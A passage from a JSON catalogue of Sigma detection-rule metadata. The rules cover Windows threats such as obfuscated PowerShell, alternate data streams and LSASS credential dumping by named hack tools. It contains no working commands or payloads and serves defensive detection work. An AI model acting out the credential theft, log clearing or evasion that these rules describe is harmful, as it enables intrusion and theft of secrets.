"attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" }, { "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads\nthat often undergo minimal changes by attackers due to bad opsec.\n", "meta": { "author": "ok @securonix invrep_de, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], "filename": "posh_pm_bad_opsec_artifacts.yml", "level": "critical", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://www.mdeditor.tw/pl/pgRt", "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "value": "Bad Opsec Powershell Code Artifacts" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might 
compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "posh_pm_susp_zip_compress.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" }, { "description": "Detects keywords that could indicate clearing PowerShell history", "meta": { "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_pm_clear_powershell_history.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"f99276ad-d122-4989-a09a-d00904a5f9d2", "value": "Clear PowerShell History - PowerShell Module" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_var.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", 
"attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f211361-7dce-442d-b78a-c04039677378", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" }, { "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "posh_pm_get_clipboard.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "value": "PowerShell Get Clipboard" }, { "description": "Detects the download of a file with a potentially suspicious extension from a .zip top level domain.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-18", "falsepositive": [ "Legitimate file downloads from a websites and web services that uses the \".zip\" top level domain." 
], "filename": "create_stream_hash_zip_tld_download.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1659175181695287297", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0bb4bbeb-fe52-4044-b40c-430a04577ebe", "value": "Potentially Suspicious File Download From ZIP TLD" }, { "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml", "level": "medium", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "value": "Unusual File Download From File Sharing Websites - File Stream" }, { "description": "Detects the creation of a named file stream with the imphash of a well-known hack tool", "meta": { "author": "Florian Roth (Nextron 
Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_hktl_generic_download.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://github.com/outflanknl/Dumpert", "https://github.com/topotam/PetitPotam", "https://github.com/antonioCoco/RoguePotato", "https://github.com/codewhitesec/HandleKatz", "https://github.com/gentilkiwi/mimikatz", "https://github.com/fortra/nanodump", "https://github.com/xuanxuan0/DripLoader", "https://github.com/ohpe/juicy-potato", "https://github.com/wavestone-cdt/EDRSandblast", "https://github.com/hfiref0x/UACME", "https://www.tarasco.org/security/pwdump_7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", "value": "HackTool Named File Stream Created" }, { "description": "Detects potential suspicious winget package installation from a suspicious source.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_winget_susp_package_source.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "value": "Potential Suspicious Winget Package Installation" }, { 
"description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", "meta": { "author": "frack113", "creation_date": "2022-10-22", "falsepositive": [ "Other legitimate browsers not currently included in the filter (please add them)", "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], "filename": "create_stream_hash_creation_internet_file.yml", "level": "medium", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "573df571-a223-43bc-846e-3f98da481eca", "value": "Creation Of a Suspicious ADS File Outside a Browser Download" }, { "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash", "meta": { "author": "Florian Roth (Nextron Systems), @0xrawsec", "creation_date": "2018-06-03", "falsepositive": [ "This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar." 
], "filename": "create_stream_hash_ads_executable.yml", "level": "medium", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "value": "Hidden Executable In NTFS Alternate Data Stream" }, { "description": "Exports the target Registry key and hides it in the specified alternate data stream.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_regedit_export_to_ads.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "value": "Exports Registry Key To an Alternate Data Stream" }, { "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Some false positives might occur with binaries download via Github" ], 
"filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.s0139", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", "value": "Suspicious File Download From File Sharing Websites - File Stream" }, { "description": "Detects the download of suspicious file type from URLs with IP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Unknown" ], "filename": "create_stream_hash_susp_ip_domains.yml", "level": "high", "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/detecting-onenote-abuse", "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", "value": "Unusual File Download from Direct IP Address" }, { "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_sysmonente.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/codewhitesec/SysmonEnte/", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_sysmonente.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "value": "HackTool - SysmonEnte Execution" }, { "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { "author": "Nik Seetharaman", "creation_date": "2018-07-16", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "proc_access_win_cmstp_execution_by_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.003", "attack.execution", "attack.t1559.001", 
"attack.g0069", "attack.g0080", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", "value": "CMSTP Execution Process Access" }, { "description": "Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.", "meta": { "author": "Bhabesh Raj, Jonhnathan Ribeiro", "creation_date": "2023-11-27", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_python_based_tool.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://twitter.com/bh4b3sh/status/1303674603819081728", "https://github.com/skelsec/pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0349" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9", "value": "Credential Dumping Activity By Python Based Tool" }, { "description": "Detects process access requests to the LSASS process with specific call trace calls and access masks.\nThis behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.\n", "meta": { "author": "Samir Bousseaden, Michael Haag", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_memdump.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", 
"refs": [ "https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "value": "Potential Credential Dumping Activity Via LSASS" }, { "description": "Detects potential calls to NtOpenProcess directly from NTDLL.", "meta": { "author": "Christian Burkard (Nextron Systems), Tim Shelton (FP)", "creation_date": "2021-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_susp_direct_ntopenprocess_call.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml" ], "tags": [ "attack.execution", "attack.t1106" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "value": "Potential Direct Syscall of NtOpenProcess" }, { "description": "Detects function calls from the EditionUpgradeManager COM interface. 
Which is an interface that is not used by standard executables.", "meta": { "author": "oscd.community, Dmitry Uchakin", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_uac_bypass_editionupgrademanagerobj.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", "value": "Function Call From Undocumented COM Interface EditionUpgradeManager" }, { "description": "Detects process access request to uncommon target images with a \"PROCESS_ALL_ACCESS\" access mask.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-27", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_susp_all_access_uncommon_target.yml", "level": "low", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_all_access_uncommon_target.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.011" ] }, "related": [ { "dest-uuid": "0042a9f5-f053-4769-b3ef-9ad018dfa298", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"a24e5861-c6ca-4fde-a93c-ba9256feddf0", "value": "Uncommon Process Access Rights For Target Image" }, { "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2012-06-27", "falsepositive": [ "Actual failures in lsass.exe that trigger a crash dump (unlikely)", "Unknown cases in which WerFault accesses lsass.exe" ], "filename": "proc_access_win_lsass_werfault.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "value": "Credential Dumping Attempt Via WerFault" }, { "description": "Detects process access requests from hacktool processes based on their default image name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-11-27", "falsepositive": [ "Unlikely" ], "filename": "proc_access_win_hktl_generic_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158", "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_generic_access.yml" ], "tags": [ 
"attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d0d2f720-d14f-448d-8242-51ff396a334e", "value": "HackTool - Generic Process Access" }, { "description": "Detects suspicious access to LSASS handle via a call trace to \"seclogon.dll\" with a suspicious access right.", "meta": { "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-29", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_seclogon_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", "https://twitter.com/SBousseaden/status/1541920424635912196", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", "value": "Suspicious LSASS Access Via MalSecLogon" }, { "description": "Detects LSASS process access requests from a source process with the \"dump\" keyword in its image name.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-10", "falsepositive": [ "Rare programs that contain the word dump in their name and access lsass" ], "filename": "proc_access_win_lsass_dump_keyword_image.yml", "level": "high", "logsource.category": "process_access", "logsource.product": 
"windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "value": "LSASS Memory Access by Tool With Dump Keyword In Name" }, { "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", "meta": { "author": "Bhabesh Raj (rule), @thefLinkk", "creation_date": "2022-06-27", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_handlekatz_lsass_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/codewhitesec/HandleKatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.defense-evasion", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "value": "HackTool - HandleKatz Duplicating LSASS Handle" }, { "description": "Detects suspicious access to the \"svchost\" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.", "meta": { 
